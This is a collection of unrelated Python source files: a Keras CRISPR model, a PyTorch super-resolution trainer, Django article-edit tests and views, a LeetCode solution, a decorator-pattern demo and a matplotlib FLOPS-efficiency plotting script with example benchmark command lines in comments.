print 'TPI computation time: ', mins, ' min, ', secs, ' sec'
elif tpi_time >= 3600 and tpi_time < 86400: # hours
hrs = int(tpi_time / 3600)
mins = int(((tpi_time / 3600) - hrs) * 60)
secs = round(((tpi_time / 60) - mins) * 60, 1)
print 'TPI computation time: ', hrs, ' hrs, ', mins, ' min, ', secs, ' sec'
elif tpi_time >= 86400: # days
days = int(tpi_time / 86400)
hrs = int(((tpi_time / 86400) - days) * 24)
mins = int(((tpi_time / 3600) - hrs) * 60)
secs = round(((tpi_time / 60) - mins) * 60, 1)
print 'TPI computation time: ', days, ' days,', hrs, ' hrs, ', mins, ' min, ', secs, ' sec'
| 22,382 | 7,926 |
from abc import ABC, abstractmethod
class Component(ABC):
"""
基本组件接口
"""
@abstractmethod
def operation(self) -> str:
"""
定义具体操作
:return:
"""
pass
class ConcreteComponent(Component):
def operation(self) -> str:
return "基本组件的基础实现"
class Decorator(Component):
"""
装饰器遵循与基本组件的接口(继承)
"""
_comment: Component = None
def __init__(self, comment: Component):
self._comment = comment
@property
def comment(self) -> Component:
return self._comment
@abstractmethod
def operation(self) -> str:
pass
class ConcreteDecoratorA(Decorator):
def operation(self) -> str:
return f"A装饰器 {self.comment.operation()}"
class ConcreteDecoratorB(Decorator):
def operation(self) -> str:
return f"B装饰器 {self.comment.operation()}"
def client_code(comment: Component) -> None:
print("执行结果", end="\n")
print(comment.operation())
if __name__ == '__main__':
simple = ConcreteComponent()
client_code(simple)
ca = ConcreteDecoratorA(simple)
client_code(ca)
cb = ConcreteDecoratorB(ca)
client_code(cb)
# """
# 装饰模式
# """
# from __future__ import annotations
# from abc import ABC, abstractmethod
#
#
# class IHouse(ABC):
# @abstractmethod
# def live(self):
# pass
#
#
# class House(IHouse):
# def live(self):
# print('房子基本功能-居住')
#
#
# class IMirrorHouse(IHouse):
# @abstractmethod
# def lookMirror(self):
# pass
#
#
# class MirrorHouse(IMirrorHouse):
# def __init__(self, se):
# self = se
#
# def lookMirror(self):
# print('有了镜子功能')
#
#
# if __name__ == '__main__':
# house = House()
# house.live()
# m = MirrorHouse(house)
# m.live()
# m.lookMirror()
| 1,812 | 682 |
# -*- coding:utf-8 -*-
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
from keras.preprocessing import text, sequence
from keras.models import Model
from keras.layers import Input, Embedding
from keras.layers.core import Dropout
from keras.layers.convolutional import Conv1D, AveragePooling1D
from keras.layers import multiply
from keras.layers.core import Dense, Reshape, Lambda, Permute, Flatten
from keras.initializers import RandomUniform
from keras import regularizers
import keras.backend as K
import keras
import numpy as np
import pandas as pd
def attention(x, g, TIME_STEPS):
input_dim = int(x.shape[2])
x1 = K.permute_dimensions(x, (0, 2, 1))
g1 = K.permute_dimensions(g, (0, 2, 1))
x2 = Reshape((input_dim, TIME_STEPS))(x1)
g2 = Reshape((input_dim, TIME_STEPS))(g1)
x3 = Dense(TIME_STEPS, kernel_initializer=RandomUniform(seed=2020))(x2)
g3 = Dense(TIME_STEPS, kernel_initializer=RandomUniform(seed=2020))(g2)
x4 = keras.layers.add([x3, g3])
a = Dense(TIME_STEPS, activation="softmax", use_bias=False)(x4)
a_probs = Permute((2, 1))(a)
output_attention_mul = multiply([x, a_probs])
return output_attention_mul
def crispr_ont():
dropout_rate = 0.4
input = Input(shape=(24,))
embedded = Embedding(7, 44, input_length=24)(input)
conv1 = Conv1D(256, 5, activation="relu", name="conv1")(embedded)
pool1 = AveragePooling1D(2)(conv1)
drop1 = Dropout(dropout_rate)(pool1)
conv2 = Conv1D(256, 5, activation="relu", name="conv2")(pool1)
conv3 = Conv1D(256, 5, activation="relu", name="conv3")(drop1)
x = Lambda(lambda x: attention(x[0], x[1], 6))([conv3, conv2])
my_concat = Lambda(lambda x: K.concatenate([x[0], x[1]], axis=1))
weight_1 = Lambda(lambda x: x * 0.2)
weight_2 = Lambda(lambda x: x * 0.8)
flat1 = Flatten()(pool1)
flat2 = Flatten()(x)
flat = my_concat([weight_1(flat1), weight_2(flat2)])
dense1 = Dense(128,
kernel_regularizer=regularizers.l2(1e-4),
bias_regularizer=regularizers.l2(1e-4),
activation="relu",
name="dense1")(flat)
drop3 = Dropout(dropout_rate)(dense1)
dense2 = Dense(64,
kernel_regularizer=regularizers.l2(1e-4),
bias_regularizer=regularizers.l2(1e-4),
activation="relu",
name="dense2")(drop3)
drop4 = Dropout(dropout_rate)(dense2)
dense3 = Dense(32, activation="relu", name="dense3")(drop4)
drop5 = Dropout(dropout_rate)(dense3)
output = Dense(1, activation="linear", name="output")(drop5)
model = Model(inputs=[input], outputs=[output])
return model
if __name__ == '__main__':
model = crispr_ont()
print("Loading weights for the models")
model.load_weights("crispr_ont.h5")
data_path = "data/test_ont.csv"
data = pd.read_csv(data_path)
x_test = make_data(data["sgRNA"])
y_pred = model.predict([x_test])
| 3,009 | 1,177 |
"""769. Max Chunks To Make Sorted"""
class Solution(object):
def maxChunksToSorted(self, arr):
"""
:type arr: List[int]
:rtype: int
"""
min_index_for_chunk_end = arr[0]
chunks = 0
for i in range(len(arr)):
min_index_for_chunk_end = max(min_index_for_chunk_end, arr[i])
if i == min_index_for_chunk_end:
chunks += 1
return chunks
| 439 | 151 |
import torch
import torch.nn as nn
import torch.optim as optim
import torch.utils.data
import torch.nn.functional as F
import torchvision
import torchvision.models as models
from torchvision import transforms
from PIL import Image
from time import time
import matplotlib.pyplot as plt
import os
import numpy as np
import sys
import cv2
#=================================================
# HYPERPARAMETERS HERE...
img_transforms = transforms.Compose([
transforms.Resize((224,224)),
transforms.RandomHorizontalFlip(p=0.5),
transforms.RandomVerticalFlip(p=0.5),
transforms.RandomRotation(45)
])
target_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225] )
])
input_transform = transforms.Compose([
transforms.Resize((56, 56)),#((224,224)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225] )
])
if torch.cuda.is_available():
device = torch.device("cuda")
else:
device = torch.device("cpu")
loss_func = torch.nn.SmoothL1Loss()
epochs = 150
batch_size=4
lr = 0.001
datapath = 'catdog/srgan_datatrain'
train_data = os.listdir(datapath)
#=================================================
# CLASS AND FUNCTION HERE...
def read_batch(datapath, imgname):
imginput = []
imgtarget = []
for i in range(len(imgname)):
img = Image.open(os.path.join(datapath, imgname[i]))
img = img_transforms(img)
imgtgt = target_transform(img)
imgtarget.append(imgtgt)
img = input_transform(img)
imginput.append(img)
imginput = torch.stack([x for x in imginput], dim=0).to(device)
imgtarget = torch.stack([x for x in imgtarget], dim=0).to(device)
# print('imginput.size(): ', imginput.size())
# print('imgtarget.size(): ', imgtarget.size())
return imginput, imgtarget
# here comes the training function!
def train(model, optimizer, loss_fn, train_data, datapath=None, batch_size = 5, epochs=20, device="cpu"):
lowest_train_loss = 1e+6
train_num = np.arange(len(train_data))
train_data = np.array(train_data)
print('=======================')
print('Training data number: ', len(train_data))
print('Start Training...')
for epoch in range(epochs):
training_loss = 0.0
valid_loss = 0.0
start = time()
model.train()
np.random.shuffle(train_num)
ctr = batch_size
start = time()
for b in range(0, len(train_num), batch_size):
batch_data = train_data[train_num[b:b+ctr]]
ctr += b
optimizer.zero_grad()
inputs, targets = read_batch(datapath, batch_data)
inputs = inputs.to(device)
targets = targets.to(device)
output = model(inputs)
loss = loss_fn(output, targets)
loss.backward()
optimizer.step()
training_loss += loss.data.item() * inputs.size(0)
training_loss /= len(train_num)
print('Epoch: {}, time: {:.2f}s, Lowest train loss: {:.2f}, Training Loss: {:.2f}'.format(epoch,
time()-start, lowest_train_loss, training_loss))
if training_loss < lowest_train_loss:
lowest_train_loss = training_loss
if epochs > 10:
torch.save(model.state_dict(), r'D:\pytorch_tutorial\catdog\srgan_trained.pth')
class OurFirstSRNet(nn.Module):
def __init__(self):
super(OurFirstSRNet, self).__init__()
self.features = nn.Sequential(
nn.Conv2d(3, 64, kernel_size=8, stride=2, padding=3),
nn.ReLU(inplace=True),
nn.Conv2d(64, 192, kernel_size=4, stride=2, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(192, 256, kernel_size=4, stride=2, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True)
)
self.upsample = nn.Sequential(
nn.ConvTranspose2d(256,256,kernel_size=2, stride=2, padding=0),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(256,192,kernel_size=2, stride=2, padding=0),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(192,128,kernel_size=2, stride=2, padding=0),
nn.ReLU(inplace=True),
nn.Conv2d(128, 128, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(128,64,kernel_size=2, stride=2, padding=0),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(64,3, kernel_size=4, stride=2, padding=1),
nn.ReLU(inplace=True)
)
def forward(self, x):
x = self.features(x)
x = self.upsample(x)
return x
# test image transform
img = Image.open(os.path.join(datapath, train_data[0]))
img = img_transforms(img)
img = input_transform(img).unsqueeze(0).to(device)
# test forward propagation
model = OurFirstSRNet()
model.to(device)
print('=======================')
print('Example input-output...')
print('input: ', img.size())
output = model(img)
print('output:', output.size())
# define Backprop Optimizer
optimizer = optim.Adam(model.parameters(), lr=lr)
model.load_state_dict(torch.load( r'catdog/srgan_trained.pth') )
# training
if sys.argv[1] == 'training':
print('...You pick mode training...')
train(model, optimizer, loss_func, train_data, datapath=datapath,
batch_size = batch_size, epochs=epochs, device=device)
# testing
if sys.argv[1] == 'detecting':
print('...You pick mode detecting...')
model.load_state_dict(torch.load( r'catdog/srgan_trained.pth') )
model.eval()
with torch.no_grad():
output = model(img).cpu().squeeze(0).numpy()
print('output:', output.shape)
# cv2.imwrite('output.png', output[...,::-1].astype(np.uint8))
| 6,023 | 2,211 |
from uuid import uuid4
from django.test import TestCase
from accounts.models import User
from articles.models import Article
from articles.testhelpers import create_user, create_mock_article, get_random_string
class EditArticleTest(TestCase):
def __init__(self, methodName: str = ...) -> None:
super().__init__(methodName)
def setUp(self) -> None:
"""Sets up test data. Creates three users and a mock article"""
create_user('TestUser', 'TestUser_P', False, False)
author = create_user('AuthorTestUser', 'AuthorTestUser_P', True, False)
create_user('AdminTestUser', 'AdminTestUser_P', False, True)
create_mock_article(author)
return super().setUp()
def tearDown(self) -> None:
User.objects.all().delete()
Article.objects.all().delete()
return super().tearDown()
def test_edit_article_get_as_unauthenticated(self):
"""
Given an article exists,
When I try to edit the article as an unauthenticated user,
Then I am redirected to the home page
"""
article = Article.objects.all().first()
response = self.client.get('/article/' + str(article.id) + '/edit')
self.assertEqual(response.status_code, 302)
def test_edit_article_get_as_authenticated_but_not_original_author(self):
"""
Given an article exists,
When I try to edit the article as not the original article author,
Then I am redirected to the home page
"""
article = Article.objects.all().first()
self.client.login(username='testuser', password='TestUser_P')
response = self.client.get('/article/' + str(article.id) + '/edit')
self.assertEqual(response.status_code, 302)
def test_edit_article_get_as_authenticated_as_original_author(self):
"""
Given an article exists,
When I try to edit the article as the original article author,
Then I am redirected to the article edit page
"""
article = Article.objects.all().first()
self.client.login(username='authortestuser', password='AuthorTestUser_P')
response = self.client.get('/article/' + str(article.id) + '/edit')
checkArticle = Article.objects.get(id=article.id)
self.assertEqual(response.status_code, 200)
self.assertEqual(checkArticle.title, article.title)
self.assertEqual(checkArticle.summary, article.summary)
self.assertEqual(checkArticle.content, article.content)
self.assertEqual(checkArticle.created_on, article.created_on)
self.assertEqual(checkArticle.updated_on, article.updated_on)
form = response.context['form']
actual_title = str(form.fields['title'].initial)
actual_summary = str(form.fields['summary'].initial)
actual_content = str(form.fields['content'].initial)
self.assertEqual(actual_title, article.title)
self.assertEqual(actual_summary, article.summary)
self.assertEqual(actual_content, article.content)
def test_edit_article_get_as_authenticated_as_admin(self):
"""
Given an article exists,
When I try to edit the article as an admin,
Then I am redirected to the article edit page
"""
article = Article.objects.all().first()
self.client.login(username='admintestuser', password='AdminTestUser_P')
response = self.client.get('/article/' + str(article.id) + '/edit')
checkArticle = Article.objects.get(id=article.id)
self.assertEqual(response.status_code, 200)
self.assertEqual(checkArticle.title, article.title)
self.assertEqual(checkArticle.summary, article.summary)
self.assertEqual(checkArticle.content, article.content)
self.assertEqual(checkArticle.created_on, article.created_on)
self.assertEqual(checkArticle.updated_on, article.updated_on)
form = response.context['form']
actual_title = str(form.fields['title'].initial)
actual_summary = str(form.fields['summary'].initial)
actual_content = str(form.fields['content'].initial)
self.assertEqual(actual_title, article.title)
self.assertEqual(actual_summary, article.summary)
self.assertEqual(actual_content, article.content)
def test_edit_article_get_with_missing_article(self):
"""
Given article does not exist,
When I try to edit the article an an author,
Then I am redirected to the home page
"""
self.client.login(username='authortestuser', password='AuthorTestUser_P')
response = self.client.get('/article/' + str(uuid4()) + '/edit')
self.assertEqual(response.status_code, 302)
def test_edit_article_get_with_missing_article_as_admin(self):
"""
Given article does not exist,
When I try to edit the article an an admin,
Then I am redirected to the home page
"""
self.client.login(username='admintestuser', password='AdminTestUser_P')
response = self.client.get('/article/' + str(uuid4()) + '/edit')
self.assertEqual(response.status_code, 302)
def test_edit_article_with_title_too_long(self):
"""
Given an article exist,
When I try to edit the article with a title that is too long,
Then I am redirected to the article edit page and my changes do not save
"""
article = Article.objects.all().first()
title = get_random_string(201)
data = {
'title': title,
'summary': 'New summary',
'content': 'New content'
}
self.client.login(username='authortestuser', password='AuthorTestUser_P')
response = self.client.post('/article/' + str(article.id) + '/edit', data=data)
checkArticle = Article.objects.get(id=article.id)
self.assertEqual(response.status_code, 200)
self.assertNotEqual(checkArticle.title, title)
self.assertNotEqual(checkArticle.summary, 'New summary')
self.assertNotEqual(checkArticle.content, 'New content')
self.assertEqual(checkArticle.created_on, article.created_on)
self.assertEqual(checkArticle.updated_on, article.updated_on)
def test_edit_article_with_summary_too_long(self):
"""
Given an article exist,
When I try to edit the article with a summary that is too long,
Then I am redirected to the article edit page and my changes do not save
"""
article = Article.objects.all().first()
summary = get_random_string(256)
data = {
'title': 'New title',
'summary': summary,
'content': 'New content'
}
self.client.login(username='authortestuser', password='AuthorTestUser_P')
response = self.client.post('/article/' + str(article.id) + '/edit', data=data)
checkArticle = Article.objects.get(id=article.id)
self.assertEqual(response.status_code, 200)
self.assertNotEqual(checkArticle.title, 'New title')
self.assertNotEqual(checkArticle.summary, summary)
self.assertNotEqual(checkArticle.content, 'New content')
self.assertEqual(checkArticle.created_on, article.created_on)
self.assertEqual(checkArticle.updated_on, article.updated_on)
def test_edit_article(self):
"""
Given an article exist,
When I try to edit the article as the author,
Then I am redirected to the article edit page and my changes save
"""
article = Article.objects.all().first()
data = {
'title': 'New title',
'summary': 'New summary',
'content': 'New content'
}
self.client.login(username='authortestuser', password='AuthorTestUser_P')
response = self.client.post('/article/' + str(article.id) + '/edit', data=data)
checkArticle = Article.objects.get(id=article.id)
self.assertEqual(response.status_code, 200)
self.assertEqual(checkArticle.title, 'New title')
self.assertEqual(checkArticle.summary, 'New summary')
self.assertEqual(checkArticle.content, 'New content')
self.assertEqual(checkArticle.created_on, article.created_on)
self.assertNotEqual(checkArticle.updated_on, article.updated_on)
def test_edit_article_as_admin(self):
"""
Given an article exist,
When I try to edit the article as an admin,
Then I am redirected to the article edit page and my changes save
"""
article = Article.objects.all().first()
data = {
'title': 'New title',
'summary': 'New summary',
'content': 'New content'
}
self.client.login(username='admintestuser', password='AdminTestUser_P')
response = self.client.post('/article/' + str(article.id) + '/edit', data=data)
checkArticle = Article.objects.get(id=article.id)
self.assertEqual(response.status_code, 200)
self.assertEqual(checkArticle.title, 'New title')
self.assertEqual(checkArticle.summary, 'New summary')
self.assertEqual(checkArticle.content, 'New content')
self.assertEqual(checkArticle.created_on, article.created_on)
self.assertNotEqual(checkArticle.updated_on, article.updated_on) | 9,517 | 2,668 |
from matplotlib import rc
rc('text', usetex=True) # this is if you want to use latex to print text. If you do you can create strings that go on labels or titles like this for example (with an r in front): r"$n=$ " + str(int(n))
from numpy import *
from pylab import *
import random
from matplotlib.font_manager import FontProperties
import matplotlib.pyplot as plt
import matplotlib.lines as lns
from scipy import stats
from matplotlib.patches import Polygon, Circle
import matplotlib.font_manager as fm
def latex_float(f):
float_str = "{0:.2g}".format(f)
if "e" in float_str:
base, exponent = float_str.split("e")
return r"{0} \times 10^{{{1}}}".format(base, int(exponent))
else:
return float_str
class EffPt( object ):
def __init__( self, elp ):
self.cols = ["varname","bxf","flops","ai","rts"]
self.varname = elp[4][6:-1]
self.bxf = float(elp[6])
self.flops = float(elp[7])
self.ai = float(elp[8])
self.rts = float(elp[9])
self.opinfo = elp[0:3] + elp[5:6] # for checking if two pts are the same operation
self.comp = None # point to compare this point against (if any)
def __str__( self ):
return " ".join( str(col)+"="+str(getattr(self,col)) for col in self.cols )
class varinfo( object ):
def __init__( self, name, color, mark='o', mark_comp='d' ):
self.name = name
self.color = color
self.mark = mark
self.mark_comp = mark_comp
self.art = plt.Line2D((0,0),(0,0), color=self.color, marker=self.mark, linestyle='')
self.art_comp = plt.Line2D((0,0),(0,0), color=self.color, marker=self.mark_comp, linestyle='')
self.num_use = 0
self.num_use_comp = 0
def clear_use( self ):
self.num_use = 0
self.num_use_comp = 0
def inc_use( self, is_comp ):
if is_comp:
self.num_use_comp += 1
else:
self.num_use += 1
def get_mark( self, is_comp ):
return self.mark_comp if is_comp else self.mark
def get_leg( self, leg_art, leg_lab ):
verb_name = "\\verb|"+self.name+"|"
if self.num_use:
leg_art.append( self.art)
leg_lab.append( verb_name )
if self.num_use_comp:
leg_art.append( self.art_comp)
leg_lab.append( verb_name[:-1] + " (Comp)|" )
self.clear_use()
vis = [
varinfo( "conv", "cornflowerblue" ),
varinfo( "conv_simd", "cornflowerblue" ),
varinfo( "k1conv", "green" ),
varinfo( "k1conv_simd", "green" ),
varinfo( "tconv", "purple" ),
varinfo( "cudnn_conv", "red" ),
]
vis_map = { vi.name:vi for vi in vis }
def inc_comp( epts ):
for ept in epts:
yield ept
if ept.comp: yield ept.comp
def read_eff_file( epts, fn ):
els = open( fn ).readlines()
for el in els:
elps = el.split("&")
elps = [ elp.strip() for elp in elps ]
#print len(elps), elps
assert len(elps) == 12
epts.append( EffPt( elps ) )
if math.isnan(epts[-1].rts): epts.pop()
def adj_tick_lab( lab ):
lt = lab.get_text()
if not lt: return ""
if lt[0] == "$": lt = lt[1:-1]
neg = 1.0
if lt[0] == u'\u2212': lt = lt[1:]; neg = -1.0
return "$%s$" % latex_float(10**(neg*float(lt)))
class EffPlot( object ):
def __init__( self, args ):
self.args = args
self.epts = []
self.epts_comp = []
read_eff_file( self.epts, self.args.eff_fn )
if self.args.eff_comp_fn:
read_eff_file( self.epts_comp, self.args.eff_comp_fn )
assert len(self.epts) == len(self.epts_comp)
for ept,ept_comp in zip(self.epts,self.epts_comp):
assert ept.opinfo == ept_comp.opinfo
ept.comp = ept_comp
self.do_plots()
if self.args.do_zooms:
for zl in [1,2]:
self.args.out_fn += "-zoom"
max_flops = max( ept.flops for ept in self.epts )
self.epts = [ ept for ept in self.epts if ept.flops < (max_flops/10.0) ]
self.do_plots()
def skip_plot_check_flops_vs_time( self, ept ):
if not ept.comp: return 0 # no comp? if so, never skip.
delta = abs( ept.rts - ept.comp.rts )
rel_delta = delta * 2.0 / (ept.rts + ept.comp.rts)
# if rel_delta < self.args.min_rel_delta_to_show: return 1 # we're really trying to show varaint difference, so skip this check
if ept.varname == ept.comp.varname: return 1 # FIXME: skip when comp is same varaint. not right in general, but okay for now
# FIXME: a few data points have the same variant, but sig. diff runtimes. there is certainly some noise in the runtimes, or the code might have shifted a bit between the two runs, or it's possible the tuning params were a little different between the two runs. for now, we'll skip such points, but we should investigate more.
return 0
def plot_flops_vs_time_pt( self, ax, ept, is_comp ):
vi = vis_map[ept.varname]
vi.inc_use( is_comp )
x,y = math.log(ept.flops,10), math.log(ept.rts,10)
ax.plot(x, y, color=vi.color, markersize=4, alpha=.7, marker=vi.get_mark(is_comp), linestyle=' ' )
return x,y
def plot_fps_vs_ai_pt( self, ax, ept, is_comp ):
vi = vis_map[ept.varname]
vi.inc_use( is_comp )
x = ept.ai
y = ept.flops/ept.rts
ax.plot( x,y, color=vi.color, markersize=2*max(1,math.log(ept.flops,10)-6), alpha=.7, marker=vi.get_mark(is_comp), linestyle=' ' )
return x,y
def do_plots( self ):
# flops vs runtime plot with 60GF/s line
background_color =(0.85,0.85,0.85) #'#C0C0C0'
grid_color = 'white' #FAFAF7'
rc('axes', facecolor = background_color)
rc('axes', edgecolor = grid_color)
rc('axes', linewidth = 1.2)
rc('axes', grid = True )
rc('axes', axisbelow = True)
rc('grid',color = grid_color)
rc('grid',linestyle='-' )
rc('grid',linewidth=0.7 )
#rc('xtick.major',size =0 )
#rc('xtick.minor',size =0 )
#rc('ytick.major',size =0 )
#rc('ytick.minor',size =0 )
# filter data based on skip check
self.epts = [ ept for ept in self.epts if not self.skip_plot_check_flops_vs_time( ept ) ]
fig = plt.figure()
ax = fig.add_subplot(111)
#formatting:
ax.set_title("RUNTIME (seconds) vs \\#-of-FLOPS [log/log scale]",fontsize=12,fontweight='bold')
ax.set_xlabel("\\#-of-FLOPS", fontsize=12) # ,fontproperties = font)
ax.set_ylabel("RUNTIME (seconds)", fontsize=12) # ,fontproperties = font)
x = [ math.log(ept.flops,10) for ept in inc_comp(self.epts) ]
y = [ math.log(ept.rts,10) for ept in inc_comp(self.epts) ]
self.set_bnds( ax, x, y )
# print matplotlib.lines.Line2D.filled_markers
# --> (u'o', u'v', u'^', u'<', u'>', u'8', u's', u'p', u'*', u'h', u'H', u'D', u'd')
for ept in self.epts:
x,y = self.plot_flops_vs_time_pt( ax, ept, 0 )
if ept.comp:
xc,yc = self.plot_flops_vs_time_pt( ax, ept.comp, 1 )
ax.plot( [x,xc], [y,yc], linewidth=0.5, color='black' )
leg_art = []; leg_lab = []
for vi in vis: vi.get_leg( leg_art, leg_lab )
legend = ax.legend(leg_art,leg_lab,loc='lower right', shadow=True, fontsize='small',numpoints=1,ncol=1)
legend.get_frame().set_facecolor('#eeddcc')
max_fps = max( ept.flops/ept.rts for ept in inc_comp(self.epts) )
log10_max_fps = int(math.ceil(math.log(max_fps,10)))
if 1:
fps_bnd = 10**log10_max_fps
self.add_fps_line( ax, fps_bnd / 10.0 )
self.add_fps_line( ax, fps_bnd / 5.0 )
self.add_fps_line( ax, fps_bnd / 2.0 )
self.add_fps_line( ax, fps_bnd )
self.adj_ticks(ax,fig)
fig.savefig( self.args.out_fn + "." + self.args.out_fmt, dpi=600, bbox_inches='tight')
fig = plt.figure()
ax = fig.add_subplot(111)
#formatting:
ax.set_title("F/s vs Arithmetic Intensity",fontsize=12,fontweight='bold')
ax.set_xlabel("Arithmetic Intensity", fontsize=12) # ,fontproperties = font)
ax.set_ylabel("F/s", fontsize=12) # ,fontproperties = font)
x = [ ept.ai for ept in inc_comp(self.epts) ]
y = [ ept.flops/ept.rts for ept in inc_comp(self.epts) ]
self.set_bnds( ax, x, y )
# print matplotlib.lines.Line2D.filled_markers
# --> (u'o', u'v', u'^', u'<', u'>', u'8', u's', u'p', u'*', u'h', u'H', u'D', u'd')
for ept in self.epts:
x,y = self.plot_fps_vs_ai_pt( ax, ept, 0 )
if ept.comp:
xc,yc = self.plot_fps_vs_ai_pt( ax, ept.comp, 1 )
ax.plot( [x,xc], [y,yc], linewidth=0.5, color='black' )
leg_art = []; leg_lab = []
for vi in vis: vi.get_leg( leg_art, leg_lab )
max_flops = max( ept.flops for ept in inc_comp(self.epts) )
mfl = int(math.ceil(math.log(max_flops,10)))
for ls in range(max(mfl-5,1),mfl):
ms=2*max(1,ls-6)
leg_art += [plt.Line2D((0,0),(0,0), color="black", marker='o', linestyle='', markersize=ms)]
leg_lab += ["$10^{"+str(ls)+"}$ Flops"]
legend = ax.legend(leg_art,leg_lab,loc='upper right', shadow=True, fontsize='small',numpoints=1,ncol=1)
legend.get_frame().set_facecolor('#eeddcc')
fig.canvas.draw()
fig.savefig( self.args.out_fn + "-ai" + "." + self.args.out_fmt, dpi=600, bbox_inches='tight')
# ai vs GF/s plot
def set_bnds( self, ax, x, y ):
self.x_min = min(x)
self.x_max = max(x)*1.05
self.y_min = min(y)
self.y_max = max(y)*1.05
ax.axis([self.x_min,self.x_max,self.y_min,self.y_max])
self.data_aspect = float(self.x_max - self.x_min ) / (self.y_max - self.y_min)
#self.axis_aspect_rat = .618
self.axis_aspect_rat = 1
self.axis_aspect = self.axis_aspect_rat * self.data_aspect
ax.set_aspect(self.axis_aspect)
def adj_ticks( self, ax, fig ):
fig.canvas.draw()
tls = ax.get_xticklabels()
tls = [ adj_tick_lab(lab) for lab in tls ]
ax.set_xticklabels( tls )
tls = ax.get_yticklabels()
tls = [ adj_tick_lab(lab) for lab in tls ]
ax.set_yticklabels( tls )
def add_fps_line( self, ax, fps ): self.add_fps_line_log( ax, fps )
def add_fps_line_lin( self, ax, fps ):
#Peak performance line and text
x = [self.x_min,(self.x_min+self.x_max)*0.5,self.x_max]
y = [ v/fps for v in x ]
y_mid = (self.y_min+self.y_max)/2
if y[1] > y_mid: # high slope case; use target y val
y[1] = y_mid
x[1] = y[1]*fps
ax.plot(x,y, linewidth=1.0, color='black', linestyle=':' )
label_string = "%.1fGF/s" % (fps/1e9)
rot=np.arctan(y[1]/x[1]*self.axis_aspect) * 180 / np.pi
ax.text(x[1], y[1], label_string, fontsize=8, rotation=rot, ha="left", va="bottom")
def add_fps_line_log( self, ax, fps ):
#Peak performance line and text
x = [self.x_min,self.x_min*0.2+self.x_max*0.8,self.x_max]
y = [ v - math.log(fps,10) for v in x ]
y_mid = self.y_min*0.2+self.y_max*0.8
if y[1] > y_mid: # high slope case; use target y val
y[1] = y_mid
x[1] = y[1] + math.log(fps,10)
ax.plot(x,y, linewidth=1.0, color='black', linestyle=':' )
label_string = "%.1fGF/s" % (fps/1e9)
rot=np.arctan(self.data_aspect) * 180 / np.pi
ax.text(x[1], y[1], label_string, fontsize=12, rotation=rot, ha="left", va="bottom")
import argparse
parser = argparse.ArgumentParser(description='Create eff plots.')
parser.add_argument('--eff-fn', metavar="FN", type=str, default="eff-tab.raw", help="filename of eff values in latex table format" )
parser.add_argument('--eff-comp-fn', metavar="FN", type=str, default="", help="filename of eff values in latex table format for comparison to those from the file specified by --eff-fn" )
parser.add_argument('--out-fn', metavar="FN", type=str, default="eff", help="base filename of output plot image" )
parser.add_argument('--out-fmt', metavar="EXT", type=str, default="png", help="extention/format for output plot image" )
parser.add_argument('--do-zooms', metavar="BOOL", type=bool, default=0, help="if true, output zoomed and 2X zoomed graphs" )
parser.add_argument('--min-rel-delta-to-show', metavar="FLOAT", type=float, default=0.05, help="if true, skip showing points where delta/avg is < this value in comparison mode" )
args = parser.parse_args()
ep = EffPlot(args)
# example command lines for generating inputs to this script:
# boda on titan-X, optimized variants enabled
# boda cnn_op_info --cnn-func-sigs-fn='%(boda_test_dir)'/conv-ops-1-5-20-nin-alex-gn.txt --op-eff-tab-fn=conv-1-5-20-nin-alex-gn-titanX-boda.raw --rtc='(be=nvrtc)' --gen-data='(type=foo,str_vals=(vi=0.0f,mode=5))' --op-tune='(tconv=1,k1conv=1)' --rtc-comp='(be=nvrtc)' --max-err=10 --show-rtc-calls=1 --mad-toler=3e-3 --print-format=1 --inc-op-info-in-eff=1
# run on SD820, optimizations enabled, no comparison:
# export SD820_RTC="rtc=(be=ipc,remote_rtc=(be=ocl,gen_src=1,gen_src_output_dir=/data/local/rtc-gen-src),spawn_str=adb shell LD_LIBRARY_PATH=/data/local/lib /data/local/bin/boda,spawn_shell_escape_args=1,boda_parent_addr=tcp:10.0.0.100:12791)"
# export OP_TUNE="op_tune=(use_culibs=0,MNt=8:8,MNb=16:16,k1conv=1,tconv=0,Kb=1,vw=8,use_local_mem=2)"
# boda cnn_op_info --cnn-func-sigs-fn='%(boda_test_dir)'/conv-ops-1-5-20-nin-alex-gn.txt --op-eff-tab-fn=conv-1-5-20-nin-alex-gn-SD820-boda.raw --"${SD820_RTC}" --"${OP_TUNE}" --show-rtc-calls=1 --peak-flops=320e9 --print-format=1 --inc-op-info-in-eff=1
| 13,953 | 5,575 |
import datetime
import json
import calendar
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.urls import reverse_lazy, reverse
from django.views.generic import FormView
from django.views.generic import ListView, CreateView, UpdateView, DeleteView, DetailView
from django.views.generic import TemplateView
from AE_academico.forms import AulaForm, MarcarAsistenciaForm, SubirNotasForm, CursoForm, EventoForm, PeriodoAcademicoForm, \
HorarioAulaForm, RegistrarNotas2Form, RecordatorioAulaForm, AulaCursoForm
from AE_academico.forms import CursoDocenteForm
from AE_academico.models import Aula, Asistencia, Notas, AulaCurso, Evento, HorarioAula, AulaMatricula, PeriodoAcademico, \
RecordatorioAula
from AE_academico.models import CursoDocente
from AE_academico.models import Curso
from enrollment.models import Matricula
from income.models import obtener_mes
from register.models import Docente, Personal, PersonalColegio, Alumno, Colegio
from django.conf import settings
from utils.middleware import validar_roles, get_current_request, get_current_colegio, get_current_user
from django.http import HttpResponseRedirect
from utils.views import MyLoginRequiredMixin
import logging
logger = logging.getLogger("project")
#####################################################
##### CRUD DE AULA #####
#####################################################
class AulaListView(MyLoginRequiredMixin, ListView):
model = Aula
template_name = 'aula_list.html'
def get(self, request, *args, **kwargs):
roles = ['promotor', 'director', 'administrativo', 'tesorero', 'cajero']
if validar_roles(roles=roles):
return super(AulaListView, self).get(request, *args, **kwargs)
else:
return HttpResponseRedirect(settings.REDIRECT_PERMISOS)
